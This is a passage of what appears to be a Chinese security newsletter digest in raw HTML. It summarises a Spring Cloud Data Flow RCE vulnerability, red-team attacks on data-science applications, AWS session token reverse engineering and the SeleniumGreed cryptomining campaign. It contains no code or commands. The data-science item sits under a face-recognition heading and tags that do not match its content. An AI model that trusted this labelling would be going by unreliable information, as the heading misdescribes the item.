	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">严重性：CVE-2024-37084 漏洞的严重性非常高，CVSS 分数为 9.8。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">影响范围：受影响的是 Spring Cloud Data Flow 的 Skipper 服务器组件，可能导致服务器完全妥协。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">默认安全性：Skipper 服务器 API 默认不对外部用户开放，但内部用户仍然面临风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">影响版本：受影响的版本为 Spring Cloud Data Flow 2.11.4 之前的版本。</section></li></ul>
	<br/>
	<p>🏷️: Spring Cloud Data Flow, 远程代码执行, 漏洞, 微服务, 数据处理平台</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 人脸识别的不同面貌：操作与攻击</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要探讨了数据科学应用程序在信息系统中的安全风险，包括远程代码执行、内网横向移动、恶意软件传播、持久性访问以及数据湖挖掘等方面的攻击手段和策略。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5142255005268704" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="949" src="https://wechat2rss.xlab.app/img-proxy/?k=ff95dadb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFiaDaN82rkpNsIOB1RYPnNIC5yn6cxxkVzZnDKO0gSwOYZlNTnQ4qqNQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6333333333333333" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=4c3e22df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFLdHnLHWhWb3bs2Diagh1Zrvka095P5acgOOice7iaw5ibylpoJsmsibibiclQ%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.6179245283018868" data-w="848" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=70d5174b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFfpl7u62CGP052d1e3I163119KeNZ996ZCh2LBfjbOvQ0qNrI66Vv6w%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用数据科学技术进行攻击的红队实战</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFOxo6QDtog4e5O6pficibQQxwiat6H6ZJic65sCBny8myPNticuqGQtGOekw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFOxo6QDtog4e5O6pficibQQxwiat6H6ZJic65sCBny8myPNticuqGQtGOekw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522188888514442"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">数据科学应用程序成为新的高价值目标：随着传统应用程序变得更加安全，攻击者转向数据科学应用程序作为新的入侵点。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">远程代码执行的可能性：通过Spotfire和Dataiku等应用程序，攻击者可以实现远程代码执行，进而控制服务器和内部网络。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">内网横向移动与恶意软件传播：利用数据科学应用程序的特性，攻击者可以在内部网络中横向移动，并传播恶意软件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">持久性访问的实现：攻击者可以通过各种方法，如C2基础设施、DLL劫持和透明化命令执行，确保对系统的长期访问。</section></li></ul>
	<br/>
	<p>🏷️: 人脸识别, 攻击, 信息系统, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x05
			 揭秘AWS会话令牌的内部结构</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文揭示了AWS会话令牌的内部结构，通过逆向工程分析，提供了代码和工具来解析和修改AWS会话令牌，并对其加密和认证协议进行了测试。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AWS 会话令牌逆向工程分析：首次公开代码和工具</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">揭秘 AWS 会话令牌内部结构</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFC9QsZxgt6xqWgyk73pgicguI4mbvryKibLAtyWGQWVOqwic0hanT03uQA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFC9QsZxgt6xqWgyk73pgicguI4mbvryKibLAtyWGQWVOqwic0hanT03uQA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855155555522821"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AWS会话令牌的内部结构和认证协议之前是一个黑箱，但现在通过逆向工程分析，这些信息变得更加透明。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AWS会话令牌的安全性得到了验证，其加密和签名密钥每小时更新一次，这限制了攻击者即使窃取了密钥也只能在有限的时间内使用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">AWS的认证系统对金色票据攻击具有相对较高的抵抗力，这表明AWS在设计其认证协议时考虑了安全性。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">研究人员提供的开源工具可以帮助用户和研究人员更好地理解和分析AWS会话令牌，同时也有助于保护和审计AWS环境的安全性。</section></li></ul>
	<br/>
	<p>🏷️: AWS, 会话令牌, 逆向工程, 加密, 认证协议</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x06
			 SeleniumGreed：利用暴露的Selenium Grid服务进行加密货币挖矿</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Wiz Research 发现了一项名为“SeleniumGreed”的恶意活动，该活动利用暴露的 Selenium Grid 服务进行加密货币挖矿。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
